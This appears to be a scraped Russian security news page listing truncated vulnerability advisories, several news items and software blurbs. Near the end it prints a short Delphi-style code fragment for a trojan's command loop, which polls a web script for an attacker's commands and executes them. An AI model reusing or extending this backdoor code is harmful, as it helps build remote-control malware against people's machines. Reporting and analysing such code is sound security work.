SQL-инъекция в ASPjar GuestBook
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существ…
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существ…
Уязвимость позволяет удаленному пользователю скачать базу данных приложения. Приложение хранит файл базы данных в доступной …
Уязвимость позволяет локальному пользователю заполучить пароли пользователей Access Remote PC. Уязвимость существует из-за т…
Уязвимость позволяет удаленному пользователю получить просмотреть произвольные файлы на системе. Уязвимость существует из-за…
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе с привилегиями web сервера. У…
Уязвимость позволяет локальному пользователю повысить свои привилегии на системе. Уязвимость существует в функции log4sh_rea…
Веб-службы решительным образом скажутся на разработке программного обеспечения, распознавание речи станет главным направлением в общении с компьютеров в ближайшие три или четыре года, поисковики станут более полноценными и простыми в обращении - такой прогноз дал всеми нами любимый Билл Гейтс на проходящее в Сингапуре конференции разработчиков
Смартфонам угрожает новая напасть. Троянская программа под видом игры Doom 2 проникает в устройство и заражает его деструкти…
Уязвимость позволяет удаленному пользователю выполнить локальные файлы и произвольные SQL команды в базе данных приложения. …
Уязвимость позволяет удаленному пользователю аварийно завершить работу браузера. Удаленный пользователь может с помощью спец…
Уязвимость позволяет удаленному пользователю вызвать аварийное завершение работы приложения. Удаленный пользователь может по…
Cредство просмотра файлов реестра Win9x/Me/NT/2K/XP.
Обнаруженные уязвимости позволяют удаленному пользователю получить потенциально важные данные и выполнить произвольные прило…
Стало известно об организации нового проекта - SeaMonkey Project, - который продолжит разработку набора открытых продуктов M…
В phpBB 2.0.15 через Viewtopic дает просмотреть все параметры соединения с базой данных - хост, пользователь, пароль.
Для версия <=2.0.16.
Компания «Лаборатория Касперского» опубликовала очередной рейтинг вирусных программ. Вирусным антигероем первого месяца лета…
Microsoft предупредила об уязвимости Internet Explorer после того, как аналитическая фирма опубликовала действующий эксплойт…
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольные SQL команды в базе данных приложения, обойт…
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе с привилегиями web серве…
Уязвимость позволяет удаленному авторизованному пользователю получить доступ к потенциально важным данным на системе. Удален…
Уязвимость позволяет удаленному пользователю аварийно завершить работу приложения. Удаленный пользователь может создать HTML…
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существ…
Уязвимость позволяет удаленному пользователю произвести HTTP Request Smuggling атаку (атаку со скрытым HTTP запросом), и отр…
Уязвимость позволяет удаленному пользователю вызвать аварийное завершение работы браузера. Уязвимость существует при обработ…
Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании системы. Локальный пользователь может вызвать функ…
Обнаруженная уязвимость позволяет локальному пользователю обойти механизм защиты от изменения данных и подделать сообщения о…
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе. Уязвимость существует в сцен…
Ограничение доступа к какой-либо области сайта обычно выглядит однообразно: каждому пользователю выдается логин и пароль или он сам их выбирает, и для входа в защищенную часть сайта их нужно ввести. С технической же точки зрения для проверки пароля используются разные методы
омпактная утилита для прямого редактирования MP3-файлов: позволяет обрезать тишину в начале и/или конце файла, нормализировать звук, а также плавно убирать его в конце композиции, обьединять файлы, редактировать ID3-тэги и записывать Mp3 непосредственно на диск - без декомпрессии в PCM-формат ( поддерживаются кодеки ACM и LAME).
Уязвимость позволяет локальному пользователю заполучить получить доступ к зарытому ключу. Уязвимость существует из-за некорр…
В Библиотеке сжатия cabinet.dll и в утилите makecab.exe обнаружена уязвимость. Во время сжатия файла с любым именем и содерж…
Уязвимость позволяет удаленному пользователю обойти фильтрацию пакетов. Уязвимость существует при включенной опции PREEMPTIO…
Обнаруженные уязвимости позволяют удаленному пользователю вызвать отказ в обслуживании.
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании системы.
Уязвимость позволят удаленному пользователю обойти аутентификацию и получить неавторизованный доступ к ресурсам сети. Уязвим…
Мобильные устройства на основе Symbian OS с поддержкой Bluetooth могут быть удаленно перезагружены простой передачей специал…
Уязвимость в viewtopic.php в версиях до 2.0.15.
Код, реализующий это, выглядит так: // сначала запрос пустой request:=''; // цикл работы трояна while true do begin // отсылаем скрипту запрос if (SendStringViaHTTP('127.0.0.1', 'test1.ru', 80, '/index.php', request, answer)<>0) then begin // если отослать не удалось - ждём минуту и крутим следующую итерацию sleep(1000*SEC); continue; end; // если отослать удалось - проверим answer if (answer='') then begin // команд от хакера нет - очистим reques, // ждём минуту и крутим следующую итерацию request:=''; sleep(1000*SEC); continue; end; // если управление дошло сюда - в answer у нас команда хакера // выполняем команду request:=DoCommand(answer); end; Здесь answer и request у нас глобальные переменные типа AnsiString
Йон Лех Йохансен, автор программы DeCSS для обхода защиты от копирования DVD-дисков, выложил на своем веб-сайте "патч", поср…